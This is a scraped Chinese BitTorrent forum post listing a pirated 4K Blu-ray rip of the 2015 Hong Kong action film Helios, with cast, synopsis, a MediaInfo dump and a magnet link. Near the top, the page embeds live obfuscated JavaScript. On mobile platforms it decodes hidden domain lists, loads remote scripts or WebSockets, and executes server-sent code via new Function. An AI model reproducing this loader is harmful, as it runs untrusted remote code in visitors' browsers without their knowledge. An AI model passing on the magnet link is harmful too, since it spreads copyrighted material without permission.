赤道[国粤语音轨/中文字幕]Helios.2015.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.2Audio.x265-10bit-迅雷下载 16.60GB

版主小s 6天前 208

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 赤道 / 大峡谷 / 赤盗 / Helios

◎年 代 2015

◎产 地 中国香港

◎类 别 剧情 / 动作 / 悬疑 / 犯罪

◎语 言 汉语普通话 / 粤语 / 韩语 / 英语

◎上映日期 2015-04-30(中国大陆/中国香港)

◎IMDb链接 https://www.imdb.com/title/tt3614922/

◎豆瓣评分 6.2/10 (103227人评价)

◎豆瓣链接 https://movie.douban.com/subject/24987018/

◎片 长 119分钟

◎导 演 梁乐民 Lok Man Leung (id:1318764)

陆剑青 Kim-ching Luk (id:1318745)

◎编 剧 梁乐民 Lok Man Leung (id:1318764)

陆剑青 Kim-ching Luk (id:1318745)

◎演 员 张学友 Jacky Cheung (id:1012563)

张家辉 Nick Cheung (id:1037273)

余文乐 Shawn Yue (id:1041510)

王学圻 Xueqi Wang (id:1054562)

文咏珊 Janice Man (id:1275670)

池珍熙 Jin-hee Ji (id:1010449)

崔始源 Si-won Choi (id:1240451)

尹贞伊 Jin-Yi Yoon (id:1320362)

顾美华 Josephine Koo (id:1288879)

冯文娟 Wenjuan Feng (id:1325753)

张震 Chen Chang (id:1077991)

朱千雪 Tracy Chu (id:1336716)

金海淑 Hae-suk Kim (id:1015294)

李泰兰 Tae-ran Lee (id:1002615)

谈善言 Hedwig Tam (id:1366380)

方保罗 Paul Fonoroff (id:1325637)

奇周峯 Joo-bong Ki (id:1051277)

尹真伊 Jin-yi Yoon (id:1344120)

袁富华 Fu-wah Yuen (id:1359508)

狼森 Philippe Joly (id:1347734)

麦克·里德 Mike Leeder (id:1382791)

何伟业 Wai-Yip Ho (id:1363760)

黄婉曼 Icy Wong (id:1378635)

陈振华 Ricky Chan (id:1382205)

林建岳 Peter Lam (id:1340495)

李菲 Fei Li (id:1400568)

周绰华 Alvin Chow (id:1425958)

何丽嫦 Lorraine Ho (id:1418364)

金培达 Peter Kam (id:1288082)

关智耀 Jason Kwan Chi-Yiu (id:1318237)

陈忠明 Ron Chan (id:1328027)

阚家伟 Ka-Wai Kam (id:1360179)

◎标 签 犯罪 / 香港 / 香港电影 / 动作 / 张家辉 / 张学友 / 张震 / 2015

◎简 介

韩国秘密核武器神秘失踪,同时载着军方手提装置的飞机在中国境内坠毁。韩方接到消息,一名疑似绰号“赤道”的危险人物(张震 饰)带着助手“信差”(文咏珊 饰)将于香港实行秘密武器交易,韩国武器专家崔民号(池珍熙 饰)与特工朴宇哲(崔始源 饰)奉命前往调查。香港反恐特勤组主管李彦 明(张家辉 饰)与督察范家明(余文乐 饰)协助韩方寻找武器,而核物理教授肇志仁(张学友 饰)也受邀协助判案。武器很快被寻回,没想到竟还隐藏着潜在危机。正当香港及韩国警方决定送还武器回韩国之际,大陆安全局高管(王学圻 饰)带着助手袁小姐(冯文娟 饰)突然出现,三方陷入周旋之中,原来“赤道”另有其人,而他们一伙儿的阴谋也开始实施……

◎获奖情况 (共2项)

第35届香港电影金像奖 (2016)

最佳女配角(提名)

└──文咏珊 (id:1275670)

最佳动作设计(提名)

  1. General

  2. Unique ID : 172416564385012782094430436560484752780 (0x81B638F0E4CB688EFD6E8DFC6580DD8C)

  3. Complete name : Helios.201[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 16.6 GiB

  7. Duration : 1 h 58 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 20.1 Mb/s

  10. Movie name : Helios 2015 2160p HDR UHD BluRay TrueHD 7.1 Atmos 2Audio [email protected]

  11. Encoded date : UTC 2021-07-20 00:20:18

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 58 min

  22. Bit rate : 12.6 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.086

  32. Stream size : 10.4 GiB (63%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : BT.2020

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 58 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 288 kb/s

  54. Maximum bit rate : 8 955 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.55 GiB (21%)

  61. Title : Cantonese

  62. Language : Chinese

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : MLP FBA

  71. Format/Info : Meridian Lossless Packing FBA

  72. Commercial name : Dolby TrueHD

  73. Codec ID : A_TRUEHD

  74. Duration : 1 h 58 min

  75. Bit rate mode : Variable

  76. Bit rate : 2 989 kb/s

  77. Maximum bit rate : 6 792 kb/s

  78. Channel(s) : 6 channels

  79. Channel layout : L R C LFE Ls Rs

  80. Sampling rate : 96.0 kHz

  81. Frame rate : 1 200.000 FPS (80 SPF)

  82. Compression mode : Lossless

  83. Stream size : 2.47 GiB (15%)

  84. Title : Mandarin

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #1

  89. ID : 4

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 51 min

  95. Bit rate : 25.3 kb/s

  96. Count of elements : 2018

  97. Stream size : 20.1 MiB (0%)

  98. Title : CHT

  99. Language : Chinese

  100. Default : Yes

  101. Forced : No


  102. Text #2

  103. ID : 5

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 51 min

  109. Bit rate : 23.5 kb/s

  110. Count of elements : 2018

  111. Stream size : 18.7 MiB (0%)

  112. Title : CHS

  113. Language : Chinese

  114. Default : No

  115. Forced : No


  116. Menu

  117. 00:00:00.000 : en:Chapter 01

  118. 00:06:54.958 : en:Chapter 02

  119. 00:12:32.208 : en:Chapter 03

  120. 00:18:17.500 : en:Chapter 04

  121. 00:23:26.750 : en:Chapter 05

  122. 00:32:46.542 : en:Chapter 06

  123. 00:39:35.708 : en:Chapter 07

  124. 00:44:44.042 : en:Chapter 08

  125. 00:51:48.708 : en:Chapter 09

  126. 00:54:14.083 : en:Chapter 10

  127. 01:00:17.875 : en:Chapter 11

  128. 01:07:03.958 : en:Chapter 12

  129. 01:12:50.708 : en:Chapter 13

  130. 01:18:10.167 : en:Chapter 14

  131. 01:23:27.625 : en:Chapter 15

  132. 01:30:09.708 : en:Chapter 16

  133. 01:36:10.792 : en:Chapter 17

  134. 01:41:18.333 : en:Chapter 18

  135. 01:49:25.500 : en:Chapter 19

  136. 01:54:38.250 : en:Chapter 20


TAGS 动作 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:EC15909F68C92EE2004C8C0B632BF644ABF09A0C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回